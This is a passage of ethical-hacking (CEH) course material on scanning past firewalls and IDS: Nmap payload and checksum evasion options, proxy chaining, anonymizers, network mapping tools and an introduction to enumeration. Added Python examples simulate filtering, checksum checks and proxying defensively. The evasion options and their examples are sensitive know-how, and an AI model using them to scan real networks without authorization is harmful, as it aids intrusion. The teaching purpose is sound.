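Ingress and egress filtering, as described above, reduced to one decision function and run over constructed sample packets. This is an added example, not code from the courseware: the 192.0.2.0/24 range stands in for the organization's own address space and the martian list is an illustrative subset, both of which are assumptions.

```python
"""Ingress and egress filtering as described above, simulated in Python.

Added example, not code from the CEH courseware. The address ranges are
constructed (RFC 5737 documentation blocks): 192.0.2.0/24 plays the role of
the organization's own range; the martian list is a short illustrative subset.
"""
import ipaddress

# Constructed: the address range assigned to our network.
INTERNAL_NETS = [ipaddress.ip_network("192.0.2.0/24")]

# Source addresses that should never arrive from the Internet (illustrative subset).
MARTIAN_NETS = [ipaddress.ip_network(n) for n in
                ("0.0.0.0/8", "127.0.0.0/8", "169.254.0.0/16", "224.0.0.0/4")]


def in_any(addr, nets):
    """True when addr falls inside any of the given networks."""
    return any(addr in net for net in nets)


def filter_packet(direction, src, dst):
    """Perimeter ACL decision for one packet. Returns (verdict, reason).

    direction: "in" for packets arriving from the Internet (ingress filtering),
               "out" for packets leaving our network (egress filtering).
    dst is carried along for logging; the source address decides the verdict.
    """
    source = ipaddress.ip_address(src)
    if direction == "in":
        # Ingress: a packet from outside must not claim one of our own addresses.
        if in_any(source, INTERNAL_NETS):
            return ("drop", "ingress: external packet claims an internal source address")
        if in_any(source, MARTIAN_NETS):
            return ("drop", "ingress: unroutable (martian) source address")
        return ("permit", "")
    if direction == "out":
        # Egress: a packet leaving us must carry one of our own source addresses;
        # otherwise an internal host is sending with a forged source.
        if not in_any(source, INTERNAL_NETS):
            return ("drop", "egress: source address is not inside our range")
        return ("permit", "")
    raise ValueError(f"unknown direction: {direction!r}")


def apply_acl(packets):
    """Run the filter over (direction, src, dst) tuples; returns the verdicts."""
    return [filter_packet(*pkt)[0] for pkt in packets]


if __name__ == "__main__":
    # Constructed sample traffic.
    sample = [
        ("in", "198.51.100.7", "192.0.2.10"),    # normal inbound
        ("in", "192.0.2.10", "192.0.2.20"),      # inbound packet forging our address
        ("in", "127.0.0.1", "192.0.2.10"),       # martian source
        ("out", "192.0.2.10", "198.51.100.7"),   # normal outbound
        ("out", "203.0.113.9", "198.51.100.7"),  # outbound with a foreign source
    ]
    for pkt, verdict in zip(sample, apply_acl(sample)):
        print(verdict, pkt)
```

On a real perimeter device this logic lives in the router or firewall ACLs; the example keeps both directions in one place so that the difference between the two checks (who may claim our addresses from outside, and who may leave with a foreign one) is visible side by side.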
Use encryption

If you want to attain maximum network security, then use strong encryption for all the traffic placed onto the transmission media without considering its type and location. This is the best way to prevent IP spoofing attacks. IPsec can be used to reduce the IP spoofing risk drastically, as it provides data authentication, integrity, and confidentiality. Furthermore, ACLs can be used for blocking private IP addresses at the downstream interfaces. Encryption sessions should be enabled on the router so that trusted hosts can communicate securely with local hosts. Attackers tend to focus on easy-to-compromise targets. If an attacker wants to break into the encrypted network, he or she has to decrypt a whole slew of encrypted packets, which is likely a difficult task. Therefore, the attacker is likely to move on and try to find another target that is easy to compromise or simply abort the attempt. Moreover, use the latest encryption algorithms that provide strong security.

SYN flooding countermeasures

Countermeasures against SYN flooding attacks can also help you to avoid IP spoofing attacks.
Creating Custom Packets (slide)
Slide notes: creating custom packets by using packet crafting tools; by appending a custom string (example: --data-string); by appending custom binary data; by appending random data; attackers send regular strings as payloads in the packets sent to the target beyond the firewall.
Creating Custom Packets

The attacker creates and sends custom packets to scan the intended target beyond the IDS/firewalls. Various techniques are used to create custom packets. Some of them are mentioned below:

Creating Custom Packets by using Packet Crafting Tools
Attackers create custom TCP packets to scan the target by bypassing the firewalls. Attackers use various packet crafting tools such as Colasoft Packet Builder (https://www.colasoft.com), NetScanTools Pro (https://www.netscantools.com), etc., to scan the target that is beyond the firewall. Packet crafting tools craft and send packet streams (custom packets) using different protocols at different transfer rates.
Colasoft Packet Builder

Source: https://www.colasoft.com

Colasoft Packet Builder is a tool that allows an attacker to create custom network packets and helps security professionals assess the network. The attacker can select a TCP packet from the provided templates and change the parameters in the decoder, hexadecimal, or ASCII editor to create a packet. In addition to building packets, Colasoft Packet Builder supports saving packets to packet files and sending packets to the network.
Figure 3.93: Screenshot of Colasoft Packet Builder
There are three views in the Packet Builder: Packet List, Decode Editor, and Hex Editor. Packet List displays all the constructed packets. When you select one or more packets for editing, they are shown in the Decode Editor and Hex Editor.
In Hex Editor, the data of the packet are represented as hexadecimal values and ASCII characters; nonprintable characters are represented by a dot in the ASCII section. You can edit either the hexadecimal values or the ASCII characters.

Decode Editor allows the attacker to edit the packets without remembering the value length, byte order, and offsets. You can select a field and change the value in the edit box.

For creating a packet, you can use the add or insert packet command in the Edit menu or the Toolbar to create a new packet. The attacker can send a constructed packet to the wire directly and control how Colasoft Packet Builder sends the packets, specifying, for example, the interval between packets, loop times, and delay between loops.
This packet builder audits networks and checks the network protection against attacks and intruders. Attackers may use this packet builder to create fragmented packets to bypass network firewalls and IDS systems. They can also create packets and flood the victim with a very large number of packets, which could result in DoS attacks.
Creating Custom Packets by Appending Custom Binary Data

Attackers send binary data (0's and 1's) as payloads in the packets sent to the target machine present behind the firewall. The option used by Nmap for appending custom binary data to the sent packets is --data <hex string>. Any <hex string> is specified in the formats 0xAABBCCDDEEFF<...>, AABBCCDDEEFF<...>, or \xAA\xBB\xCC\xDD\xEE\xFF<...>. To perform a byte-order conversion, the specified information should be based on the receiver's expectations. Attackers can use this technique to scan the target by manipulating the firewalls by appending custom binary or hex data to the sent packets.

Example: --data 0xdeadbeef (or) --data \xCA\xFE\x09
Figure 3.94: Screenshot of appending binary string in Zenmap
Creating Custom Packets by Appending Custom String

Attackers send regular strings as payloads in the packets sent to the target machine for scanning beyond the firewall. The option used by Nmap for appending a custom string to the sent packets is --data-string <string>. The <string> can contain any characters; however, a few characters depend on the system's location and are not guaranteed.

Example: --data-string "Scan conducted by Security Ops, extension 7192" (or) --data-string "Ph34r my l33t skills"
Figure 3.95: Screenshot of appending custom string in Zenmap

Creating Custom Packets by Appending Random Data
Attackers append a number of random data bytes to most packets sent without using any protocol-specific payloads. The option used by Nmap for appending random data to the sent packets is --data-length <number>. For protocol-specific and no random payloads, --data-length 0 is used. The (-O) OS detection packets are not affected, as probe consistency is needed for it to be accurate. By default, a few UDP ports and IP protocols get a custom payload. Attackers can use this technique to scan the target by manipulating firewalls by appending random data or numbers to the sent packets.

Example: --data-length 1 (or) --data-length 5
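To see exactly which bytes each of the three options discussed above (--data, --data-string, --data-length) appends to a probe, here is an added example that decodes the argument formats the text lists. It is not Nmap's code and not code from the courseware; the use of os.urandom for --data-length and UTF-8 encoding for --data-string are assumptions made for the illustration.

```python
"""Builds the payload bytes that the three Nmap options discussed above
(--data, --data-string, --data-length) would append to a probe.

Added example, not Nmap's own code and not from the CEH courseware: it mirrors
the argument formats the text gives so a defender can see which bytes such
probes carry. The random bytes for --data-length come from os.urandom here
(an assumption; Nmap's own generator is not reproduced).
"""
import os
import re


def parse_nmap_hex(arg):
    """Decode a --data <hex string> argument in any of the three accepted forms:
    0xAABBCC..., AABBCC..., or \\xAA\\xBB\\xCC... Returns the raw bytes."""
    text = arg.strip()
    if text.startswith("\\x"):
        # \xAA\xBB form: every byte must be written as \x followed by two hex digits.
        if not re.fullmatch(r"(\\x[0-9A-Fa-f]{2})+", text):
            raise ValueError(f"malformed \\x-style hex string: {arg!r}")
        text = text.replace("\\x", "")
    elif text[:2].lower() == "0x":
        text = text[2:]
    if not text or len(text) % 2 or not re.fullmatch(r"[0-9A-Fa-f]+", text):
        raise ValueError(f"hex string must have an even number of hex digits: {arg!r}")
    return bytes.fromhex(text)


def build_payload(option, value):
    """Return the bytes appended to each probe for the given option."""
    if option == "--data":
        return parse_nmap_hex(value)
    if option == "--data-string":
        # A plain string; encoded as UTF-8 here (assumption; the text notes that
        # a few characters depend on the system's location).
        return value.encode("utf-8")
    if option == "--data-length":
        length = int(value)
        if length < 0:
            raise ValueError("length must be non-negative")
        return os.urandom(length)   # assumption: any random bytes serve the purpose
    raise ValueError(f"unsupported option: {option}")


if __name__ == "__main__":
    for opt, val in [("--data", "0xdeadbeef"),
                     ("--data", r"\xCA\xFE\x09"),
                     ("--data-string", "Ph34r my l33t skills"),
                     ("--data-length", "5")]:
        print(opt, val, "->", build_payload(opt, val).hex())
```

A defender reviewing captures can use the same decoding to recognise that a probe's payload is an arbitrary constant (as with --data), a readable string (as with --data-string), or padding of a fixed length (as with --data-length), none of which a legitimate client of the probed service would normally send.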
Figure 3.96: Screenshot of appending random string in Zenmap
Randomizing Host Order and Sending Bad Checksums (slide)
Slide notes: attackers can scan the hosts in the target network in random order to scan an intended target that is behind a firewall; attackers send packets with bad or bogus TCP/UDP checksums to the intended target to avoid certain firewall rules.
Randomizing Host Order and Sending Bad Checksums

Randomizing Host Order

The attacker scans the number of hosts in the target network in a random order to scan the intended target that is lying beyond the firewall. The option used by Nmap to scan with a random host order is --randomize-hosts. This technique instructs Nmap to shuffle each group of 16384 hosts before scanning with slow timing options, thus making the scan less notable to network monitoring systems and firewalls. If larger group sizes are to be randomized, PING_GROUP_SZ should be increased in nmap.h and Nmap should be compiled again. Another method can be followed by generating the target IP list with the list scan command (-sL -n -oN <filename>), randomizing the list with a Perl script, and then providing the whole list to Nmap using the -iL option.
Figure 3.97: Screenshot of randomizing hosts in Zenmap

Sending Bad Checksums

Figure 3.98: Screenshot of scanning by sending bad checksums in Zenmap
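What "sending bad checksums" means at the byte level, and the check that exposes such packets, as an added example that is not taken from the courseware or from Nmap: the RFC 1071 Internet checksum verified over a constructed IPv4 header, with a deliberately corrupted copy beside it. The header bytes are constructed for illustration.

```python
"""Verifying IPv4 header checksums, the check that a packet sent with a "bad
checksum" fails. Added example, not from the CEH courseware or Nmap. The sample
header is a constructed 20-byte IPv4 header (192.168.0.1 -> 192.168.0.199, UDP);
its correct checksum value is 0xB861.
"""


def internet_checksum(data):
    """RFC 1071 ones'-complement sum over 16-bit words (an odd trailing byte is
    zero-padded); returns the 16-bit complement of the folded sum."""
    if len(data) % 2:
        data += b"\x00"
    total = 0
    for i in range(0, len(data), 2):
        total += (data[i] << 8) | data[i + 1]
    while total >> 16:                       # fold carries back into 16 bits
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF


def ipv4_checksum_ok(header):
    """True when the header's checksum field is valid: the checksum computed over
    the whole header, checksum field included, must come out as 0."""
    if len(header) < 20 or header[0] >> 4 != 4:
        return False
    ihl = (header[0] & 0x0F) * 4
    if ihl < 20 or len(header) < ihl:
        return False
    return internet_checksum(header[:ihl]) == 0


def with_checksum(header, value):
    """Return a copy of the header with the checksum field (bytes 10-11) replaced."""
    return header[:10] + value.to_bytes(2, "big") + header[12:]


# Constructed sample: 45 00 00 73 00 00 40 00 40 11 b8 61 c0 a8 00 01 c0 a8 00 c7
SAMPLE_HEADER = bytes.fromhex("45000073000040004011b861c0a80001c0a800c7")


def classify(packets):
    """Defender-side triage: label each (name, header) pair 'ok' or 'bad-checksum'.
    A receiving host's IP stack discards bad-checksum packets, so a run of them
    from one source is not ordinary traffic and is worth alerting on."""
    return [(name, "ok" if ipv4_checksum_ok(h) else "bad-checksum") for name, h in packets]


if __name__ == "__main__":
    crafted = with_checksum(SAMPLE_HEADER, 0x1234)
    print(hex(internet_checksum(with_checksum(SAMPLE_HEADER, 0))))  # 0xb861
    print(classify([("genuine", SAMPLE_HEADER), ("crafted", crafted)]))
```

The same ones'-complement routine covers TCP and UDP checksums, except that those are computed over a pseudo-header plus the segment rather than over the IP header alone; a firewall or IDS that validates checksums before applying its rules does not see the probe the way the end host does, which is the gap the technique relies on.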
Proxy Servers (slide)
A proxy server is an application that can serve as an intermediary for connecting with other computers.
Why attackers use proxy servers: to hide the actual source of an attack by impersonating a fake source address of the proxy; to interc ept the requests sent by a user and transmit them to a third destination; to chain multiple proxy servers to avoid detection.
Note: A search in Google will list thousands of free proxy servers.
Proxy Servers

A proxy server is an application that can serve as an intermediary for connecting with other computers. A proxy server is used:

- As a firewall and to protect the local network from external attacks.
- As an IP address multiplexer that allows several computers to connect to the Internet when you have only one IP address (NAT/PAT).
- To anonymize web surfing (to some extent).
- To extract unwanted content, such as ads or "unsuitable" material (using specialized proxy servers).
- To provide some protection against hacking attacks.
- To save bandwidth.
How does a proxy server work?

Initially, when you use a proxy to request a particular web page on an actual server, the proxy server receives it. The proxy server then sends your request to the actual server on your behalf. It mediates between you and the actual server to transmit and respond to the request, as shown in the figure below.

Figure 3.99: Attacker using a proxy server for connecting to the target
Best Free Proxy Servers for Anonymous Web Surfing (slide)
An anonymous proxy server, also called a CGI proxy, is a server that works through a web form.

Figure 3.100: Free Proxy Servers
Proxy Chaining (slide)
Slide notes: the user requests a resource from the destination; a proxy client connects to the proxy server and passes the request; the proxy server strips the user's identification information and passes the request to the next proxy server; this process is repeated by all the proxy servers in the chain.
Proxy Chaining

Proxy chaining helps an attacker to increase his/her Internet anonymity. Internet anonymity depends on the number of proxies used for fetching the target application; the larger the number of proxy servers used, the greater is the attacker's anonymity. The proxy chaining process is described below:

- The user requests a resource from the destination.
- A proxy client in the user's system connects to a proxy server and passes the request to the proxy server.
- The proxy server strips the user's identification information and passes the request to the next proxy server.

Figure 3.101: Proxy Chaining
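The proxy chaining process described above, simulated hop by hop so that the difference between a proxy that strips the user's identification information and one that records it is visible from the web server's side. This is an added example and not code from the courseware; the addresses are constructed, and the header names (X-Forwarded-For, Via, Forwarded, X-Real-IP) are the common proxy-related headers, assumed here for the illustration.

```python
"""Simulates the proxy-chaining process described above and shows what the
destination web server can still see. Added example, not from the CEH courseware.
All IP addresses are constructed (RFC 5737 documentation ranges) and the header
names are the common proxy-related ones, assumed for the illustration.
"""

IDENTIFYING_HEADERS = ("X-Forwarded-For", "Via", "Forwarded", "X-Real-IP")


def forward_through_proxy(request, proxy_ip, anonymizing):
    """One hop of the chain: the proxy becomes the new source of the request.
    An anonymizing proxy strips the user's identification information; a
    transparent one records the previous source in X-Forwarded-For and Via."""
    headers = dict(request["headers"])
    if anonymizing:
        for name in IDENTIFYING_HEADERS:
            headers.pop(name, None)
    else:
        prior = headers.get("X-Forwarded-For")
        headers["X-Forwarded-For"] = f"{prior}, {request['src']}" if prior else request["src"]
        headers["Via"] = f"1.1 {proxy_ip}"
    return {"src": proxy_ip, "dst": request["dst"], "headers": headers}


def chain_request(request, proxies):
    """Pass the request through each (proxy_ip, anonymizing) hop in order and
    return what the destination receives."""
    for proxy_ip, anonymizing in proxies:
        request = forward_through_proxy(request, proxy_ip, anonymizing)
    return request


def proxy_indicators(request):
    """Defender side: which headers in the received request reveal proxying."""
    return [name for name in IDENTIFYING_HEADERS if name in request["headers"]]


if __name__ == "__main__":
    # Constructed: a client behind two anonymizing proxies and one transparent proxy.
    client = {"src": "192.0.2.10", "dst": "203.0.113.80",
              "headers": {"Host": "www.example.com"}}
    chain = [("198.51.100.1", True), ("198.51.100.2", True), ("198.51.100.3", False)]
    seen = chain_request(client, chain)
    print(seen["src"], seen["headers"], proxy_indicators(seen))
```

With every hop anonymizing, the server records only the last proxy's address and no proxy headers at all; a transparent hop at the end discloses the hop before it but still not the client, which is why, from the defender's side, the source address and X-Forwarded-For of a proxied request are attribution hints rather than the origin.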
Proxy Tools (slide)
Slide notes: Proxy Switcher allows you to surf anonymously on the Internet without disclosing your IP address; CyberGhost VPN hides your IP address, thus allowing you to surf anonymously.
Proxy Tools

Proxy tools are intended to allow users to surf the Internet anonymously by keeping their IP hidden through a chain of SOCKS or HTTP proxies. These tools can also act as HTTP, mail, FTP, SOCKS, news, telnet, and HTTPS proxy servers.

Proxy Switcher

Source: http://www.proxyswitcher.com

Proxy Switcher allows attackers to surf the Internet anonymously without disclosing their IP address. It also helps attackers to access various blocked sites in the organization. In addition, it avoids all sorts of limitations imposed by target sites.
Figure 3.102: Screenshot of Proxy Switcher
CyberGhost VPN

Source: https://www.cyberghostvpn.com

CyberGhost VPN hides the attacker's IP and replaces it with a selected IP, allowing him or her to surf anonymously and access blocked or censored content. It encrypts the connection and does not keep logs, thus securing data.
Figure 3.103: Screenshot of CyberGhost
In addition to the proxy tools mentioned above, there are many other proxy tools intended to allow users to surf the Internet anonymously. Some additional proxy tools are listed below:

- Burp Suite (https://www.portswigger.net)
- Tor (https://www.torproject.org)
- CCProxy (https://www.youngzsoft.net)
- Hotspot Shield (https://www.hotspotshield.com)
Proxy Tools for Mobile (slide)

Figure 3.104: Screenshot of Shadowsocks
ProxyDroid

Source: https://github.com

ProxyDroid is an app that can help you to set the proxy (http/socks4/socks5) on your Android devices. It supports HTTP/HTTPS/SOCKS4/SOCKS5 proxy and also supports basic/NTLM/NTLMv2 authentication methods. Attackers can use this tool as a DNS proxy to access IP addresses that are beyond the firewalls.
Figure 3.105: Screenshot of ProxyDroid
Proxy Manager

Source: https://play.google.com

Proxy Manager is another Android-based HTTP/SOCKS4/SOCKS5 proxy tool that supports proxy and user authentication. It enables attackers to surf the Internet anonymously.
Figure 3.106: Screenshot of Proxy Manager
Anonymizers (slide)
An anonymizer removes all identity information from the ...
Why use an anonymizer: privacy and anonymity; protection against online attacks; access to restricted content.
Anonymizers

An anonymizer is an intermediate server placed between you as the end user and the website to access the website on your behalf and make your web surfing activities untraceable. Anonymizers allow you to bypass Internet censors. An anonymizer eliminates all the identifying information (IP address) from your system while you are surfing the Internet, thereby ensuring privacy. Most anonymizers can anonymize the web (http:), file transfer protocol (ftp:), and gopher (gopher:) Internet services.

To visit a website anonymously, you can visit your preferred anonymizer site and enter the name of the target website in the anonymization field. Alternatively, you can set your browser home page to point to an anonymizer so that every subsequent web access you make is anonymized. In addition, you can choose to anonymously provide passwords and other information to sites without revealing any additional information, such as your IP address. Attackers may configure an anonymizer as a permanent proxy server by making the site name the setting for the HTTP, FTP, Gopher, and other proxy options in their application configuration menu, thereby cloaking their malicious activities.
Why Use an Anonymizer?

The reasons for using anonymizers include:

- Ensuring privacy: Protect your identity by making your web navigation activities untraceable. Your privacy is maintained until and unless you disclose your personal information on the web, for example, by filling out forms.
- Accessing government-restricted content: Most governments prevent their citizens from accessing certain websites or content deemed inappropriate or sensitive. However, these sites can still be accessed using an anonymizer located outside the target country.
- Protection against online attacks: An anonymizer can protect you from all instances of online pharming attacks by routing all customer Internet traffic via its protected DNS server.
Networked Anonymizers

A networked anonymizer first transfers your information through a network of Internet-connected computers before passing it on to the website. Because the information passes through several Internet computers, it becomes cumbersome for anyone trying to track your information to establish the connection between you and the anonymizer.

Example: If you want to visit any web page, you have to make a request. The request will first pass through the A, B, and C Internet computers before going to the website.

Advantage: Complication of the communications makes traffic analysis complex.

Disadvantage: Any multi-node network communication incurs some degree of risk of compromising confidentiality at each node.

Single-Point Anonymizers

Single-point anonymizers first transfer your information through a website before sending it to the target website and then pass back the information gathered from the target website to you via the website to protect your identity.

Advantage: Arms-length communication hides the IP address and related identifying information.

Disadvantage: It offers less resistance to sophisticated traffic analysis.
Censorship Circumvention Tools: Alkasir and Tails (slide)
Censorship Circumvention Tools

Alkasir

Source: https://github.com

Alkasir is a cross-platform, open-source, and robust website censorship circumvention tool that also maps censorship patterns around the world. Alkasir enables attackers to identify censored links. It keeps them informed about links that are still blocked and links that are not blocked.

Figure 3.107: Screenshot of Alkasir
Tails

Source: https://tails.boum.org

Tails is a live OS that users can run on any computer from a DVD drive, USB stick, or SD card. It uses state-of-the-art cryptographic tools to encrypt files, emails, and instant messaging. It allows attackers to use the Internet anonymously and circumvent censorship. It leaves no trace on the computer.

Figure 3.108: Screenshot of Tails
Anonymizers: Whonix and Psiphon (slide)
Slide notes: Whonix is a desktop OS designed for advanced security and privacy; Psiphon is an anonymizer software that allows attackers to surf the Internet through a secure proxy.
Anonymizers

An anonymizer helps you to mask your IP address so that you can visit websites without being tracked or identified while keeping your activity and identity protected. It uses various techniques such as SSH, VPN, and HTTP proxies, which allow you to access blocked or censored content on the Internet with omitted advertisements.
Whonix

Source: https://www.whonix.org

Whonix is a desktop OS designed for advanced security and privacy. It mitigates the threat of common attack vectors while maintaining usability. Online anonymity is realized via fail-safe, automatic, and desktop-wide use of the Tor network. It consists of a heavily reconfigured Debian base that is run inside multiple virtual machines, providing a substantial layer of protection from malware and IP address leaks.

Figure 3.109: Screenshot of Whonix
Psiphon

Source: https://psiphon.ca

Psiphon is an open-source anonymizer software that allows attackers to surf the Internet through a secure proxy. After installation, it will automatically configure the Windows machine's proxy configurations in such a way that the network traffic for the web applications and browsers that operate through these configurations will be tunneled through Psiphon.

Figure: Screenshot of Psiphon
Anonymizers for Mobile

Orbot

Source: https://guardianproject.info

Orbot is a proxy app that allows other apps to use the Internet more securely. It uses Tor to encrypt Internet traffic and then hides it by bouncing through a series of computers around the world. Tor is a free software that provides an open network to help defend your system against any form of network surveillance that may compromise personal freedom and privacy as well as confidential business activities and relationships through a type of state security monitoring known as "traffic analysis." Orbot creates a truly private Internet connection.
Psiphon

Source: https://psiphon.ca

Psiphon is a circumvention tool developed by Psiphon, Inc., which uses VPN, SSH, and HTTP proxy technology to provide you with open and uncensored access to Internet content. However, Psiphon does not increase online privacy and is not an online security tool.

Features:

- Browser or VPN (whole-device) mode: one can choose whether to tunnel everything or just the web browser.
- In-app stats: This lets you know how much traffic you have been using.
Figure 3.112: Screenshot of Psiphon

OpenDoor

Source: https://www.apple.com

OpenDoor is an app designed for both iPhone and iPad; it allows attackers to browse websites smoothly and anonymously.

Figure 3.113: Screenshot of OpenDoor
Module Flow (slide)
Network Scanning Concepts; Scanning Tools; Port and Service Discovery; OS Discovery (Banner Grabbing/OS Fingerprinting); Scanning Beyond IDS and Firewall; Drawing Network Diagrams
Drawing Network Diagrams (slide)
Slide notes: a diagram of a target network provides an attacker with valuable information about the target network and its architecture; network diagrams show logical or physical paths to a potential target network.
Drawing Network Diagrams

Drawing a network diagram helps an attacker to identify the topology or architecture of a target network. The network diagram also helps to trace the path to the target host in the network and enables the attacker to understand the positions of firewalls, IDS, routers, and other access control devices. Once the attacker has this information, he/she can find the vulnerabilities or weak points in these security mechanisms. Then, the attacker can exploit these weaknesses to find his/her way into the victim's network.

Network administrators use network discovery or mapping tools to draw network diagrams to manage their networks. Attackers also use these tools to draw network diagrams of target networks. An example of a network diagram is shown below.
Figure 3.114: Example of Network Diagram
Network Discovery and Mapping Tools (slide)

Network Discovery and Mapping Tools
Network discovery and mapping tools allow you to view the map of your network. They help you to detect rogue hardware and software violations and notify you whenever a particular host becomes active or goes down. Thus, you can also determine server outages or problems related to performance. An attacker can use the same tools to draw a diagram of the target network, analyze the topology, find the vulnerabilities or weak points, and launch an attack by exploiting these weak points.
Network Topology Mapper

Source: https://www.solarwinds.com

The Network Topology Mapper tool allows one to automatically discover and create a network map of the target network. It can also display in-depth connections such as OSI Layer 2 and Layer 3 topology data (e.g., switch-to-switch, switch-to-node, and switch-to-router connections). It can keep track of network changes and allow the user to perform inventory management of hardware and software assets.

Features:

- Network topology discovery and mapping: Automatically discovers the entire network and creates comprehensive and detailed network maps
- Export network diagrams: Exports network diagrams to Microsoft Office® Visio®, PDF, and PNG formats and to Orion Network Atlas
- Network mapping for regulatory compliance: Allows one to directly address PCI compliance and other regulations that require maintenance of an up-to-date network diagram
- Multi-level network discovery: Performs multi-level network discovery to produce an integrated OSI Layer 2 and Layer 3 network map that includes detailed device information
- Auto-detection of changes to network topology: Automatically detects new devices and changes to network topology with scheduled network scanning

Figure 3.115: Screenshot of SolarWinds Network Topology Mapper

Some additional network discovery tools are listed below:

- OpManager (https://www.manageengine.com)
- The Dude (https://www.mikrotik.com)
- NetSurveyor (http://nutsaboutnets.com)
- NetBrain (https://www.netbraintech.com)
- Spiceworks Network Mapping Tool (https://www.spiceworks.com)
Network Discovery Tools for Mobile (slide)

Network Discovery Tools for Mobile

Some network discovery tools for mobile devices are as follows:

Scany
Source: http://happymagenta.com

Scany, a network scanner app for iPhone and iPad, scans LAN, Wi-Fi networks, websites, and open ports, discovers network devices, and digs network info. It supports several networking protocols and anti-stealth networking technologies. It is a multifunctional instrument for finding connected devices, looking up detailed device information, network troubleshooting, scanning ports, and testing network security and firewalls. Attackers use this tool to scan both the LAN and the Internet, scan any IP address or network range, perform hostname, device name, MAC address, and hardware vendor lookups, ping/trace hosts with integrated tools, and WHOIS hostnames, IP addresses, ASNs, etc.

Figure 3.116: Screenshot of Scany
Network Analyzer

Source: https://play.google.com

Network Analyzer can diagnose various problems in the Wi-Fi network setup or Internet connectivity, and it can also detect various issues in remote servers based on its wide range of in-built tools. Attackers can use it to perform ping, traceroute, port scanning, Whois, and DNS lookup activities.

Figure 3.117: Screenshot of Network Analyzer
PortDroid Network Analysis

Source: https://play.google.com

Attackers can use PortDroid Network Analysis to perform local network discovery. It is also effective in analyzing the network and performing port scanning as well as banner grabbing using certain protocols, including ssh, telnet, http, https, ftp, smb, etc.

Figure 3.118: Screenshot of Network Analyzer
Module Summary

This module discussed how attackers determine live hosts from a range of IP addresses by sending various ping scan requests to multiple hosts. It also described how attackers perform different scanning techniques to determine open ports, services, service versions, etc., on the target system. Furthermore, it explained how attackers perform banner grabbing or OS fingerprinting to determine the OS running on a remote target system. It also illustrated various scanning techniques that attackers can adopt to bypass IDS/firewall rules and logging mechanisms and hide themselves as usual under the target's network traffic. Finally, it ended with a detailed discussion on drawing network diagrams and its significance in providing valuable information about the network and its architecture to an attacker.
Module 04: Enumeration

Module Objectives
In the previous modules, you learned about footprinting and network scanning. This module covers the next phase, enumeration. We start with an introduction to enumeration concepts. Subsequently, the module provides insight into different techniques for Network Basic Input/Output System (NetBIOS), Simple Network Management Protocol (SNMP), Lightweight Directory Access Protocol (LDAP), Network Time Protocol (NTP), Network File System (NFS), Simple Mail Transfer Protocol (SMTP), Domain Name System (DNS), Internet Protocol Security (IPsec), Voice over Internet Protocol (VoIP), remote procedure call (RPC), Linux/Unix, Telnet, File Transfer Protocol (FTP), Server Message Block (SMB), Internet Protocol version 6 (IPv6), Trivial FTP (TFTP), and Border Gateway Protocol (BGP) enumeration. The module ends with an overview of enumeration countermeasures.
At the end of this module, you will be able to:
- Describe enumeration concepts
- Explain different techniques for NetBIOS enumeration
- Explain different techniques for SNMP enumeration
- Explain different techniques for LDAP enumeration
- Explain different techniques for NTP enumeration
- Explain different techniques for NFS enumeration
- Explain different techniques for SMTP and DNS enumeration
- Explain other enumeration techniques such as IPsec, VoIP, RPC, Linux/Unix, Telnet, FTP, TFTP, SMB, IPv6, and BGP enumeration
- Apply enumeration countermeasures
Enumeration Concepts

In the enumeration phase, attackers enumerate usernames and other information on the groups, network shares, and services of networked computers. This information helps the attackers identify vulnerabilities in the target network and exploit them to hack the system.
What is Enumeration?

Enumeration is the process of extracting usernames, machine names, network resources, shares, and services from a system or network. In the enumeration phase, an attacker creates active connections with the system and sends directed queries to gain more information about the target. The attacker uses the information collected using enumeration to identify vulnerabilities in the system security, which help them exploit the target system. In turn, enumeration allows the attacker to perform password attacks to gain unauthorized access to information system resources. Enumeration techniques work in an intranet environment.

In particular, enumeration allows the attacker to collect the following information:
- Network resources
- Network shares
- Routing tables
- Audit and service settings
- SNMP and fully qualified domain name (FQDN) details
- Machine names
- Users and groups

During enumeration, attackers
Techniques for Enumeration

The following techniques are used to extract information about a target:

- Extract usernames using email IDs: Every email address contains two parts, a username and a domain name, in the format "username@domainname."

- Extract information using DNS Zone Transfer: A network administrator can use DNS zone transfer to replicate DNS data across several DNS servers or backup DNS files. For this purpose, the administrator needs to execute a zone-transfer request to the name server. If the name server permits zone
transfer, it will convert all the DNS names and IP addresses hosted by that server to ASCII text. If the network administrators did not configure the DNS server properly, the DNS zone transfer can be an effective method to obtain information about the organization's network. This information may include lists of all named hosts, sub-zones, and related IP addresses. A user can perform DNS zone transfer using the nslookup and dig commands.
- Extract user groups from Windows: To extract user groups from Windows, the attacker should have a registered ID as a user in the Active Directory. The attacker can then extract information from groups in which the user is a member by using the Windows interface or command-line method.

- Extract usernames using SNMP: Attackers can easily guess read-only or read-write community strings by using the SNMP application programming interface (API) to extract usernames.
Services and Ports to Enumerate

Transmission Control Protocol (TCP) and User Datagram Protocol (UDP) manage data communications between terminals in a network. TCP supports the following:
- Supports acknowledgement for data receiving through a sliding window acknowledgement system
- Offers automatic retransmission of lost or acknowledged data
- Allows addressing and multiplexing of data
- A connection can be established, managed, or terminated
- Offers quality-of-service transmission
- Offers congestion and flow control management

UDP is a connectionless protocol that carries short messages over a computer network. It provides unreliable service. The applications of UDP include the following:
- Audio streaming
- Videoconferencing and teleconferencing
Services and TCP/UDP ports that can be enumerated include the following.

TCP/UDP 53: DNS Zone Transfer

The DNS resolution process establishes communication between DNS clients and DNS servers. DNS clients send DNS messages to DNS servers listening on UDP port 53. If the DNS message size exceeds the default size of UDP (512 octets), the response contains only the data that UDP can accommodate, and the DNS server sets a flag to indicate the
(NBT) protocol to work on TCP/IP. Directly hosted SMB traffic uses port 445 (TCP and UDP) instead of NetBIOS.
UDP 161: Simple Network Management Protocol (SNMP)

SNMP is widely used in network management systems to monitor network-attached devices such as routers, switches, firewalls, printers, and servers. It consists of a manager and agents. The agent receives requests on port 161 from the managers and responds to the managers on port 162.
TCP/UDP 389: Lightweight Directory Access Protocol (LDAP)

LDAP is a protocol for accessing and maintaining distributed directory information services over an IP network. By default, LDAP uses TCP or UDP as its transport protocol over port 389.
TCP 2049: Network File System (NFS)

The NFS protocol is used to mount file systems on a remote host over a network, and users can interact with the file systems as if they are mounted locally. NFS servers listen to their client systems on TCP port 2049. If NFS services are not properly configured, then attackers may exploit the NFS protocol to gain control over a remote system, perform privilege escalation, inject backdoors or malware on a remote host, etc.
TCP 25: Simple Mail Transfer Protocol (SMTP)

SMTP is a TCP/IP mail delivery protocol. It transfers email across the Internet and across local networks. It runs on the connection-oriented service provided by TCP and uses the well-known port number 25. The table below lists some commands used by SMTP and their respective syntaxes.

| Command | Syntax |
